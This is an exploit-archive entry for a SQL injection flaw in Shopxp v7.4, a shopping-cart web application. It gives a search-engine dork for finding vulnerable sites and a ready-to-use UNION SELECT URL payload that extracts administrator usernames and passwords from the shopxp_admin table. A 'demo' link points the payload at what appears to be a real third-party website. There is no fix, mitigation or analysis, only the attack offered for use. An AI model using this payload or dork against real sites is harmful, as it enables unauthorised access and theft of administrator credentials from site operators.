id: 13254
date: 03/30/2010
title: Shopxp v7.4 SQL Injection Vulnerability
author: n/a
cves: 

=======================================
Shopxp v7.4 SQL Injection Vulnerability
=======================================


[~] DORK: "inurl:"inurl:shopxp_news.asp"

####################################


[~]ExPl0iT : /TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

[~]Dem0:  http://www.qiangtie531.com/TEXTBOX2.ASP?action=modify&newsid=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin



#  0day.today [2023-03-23]  #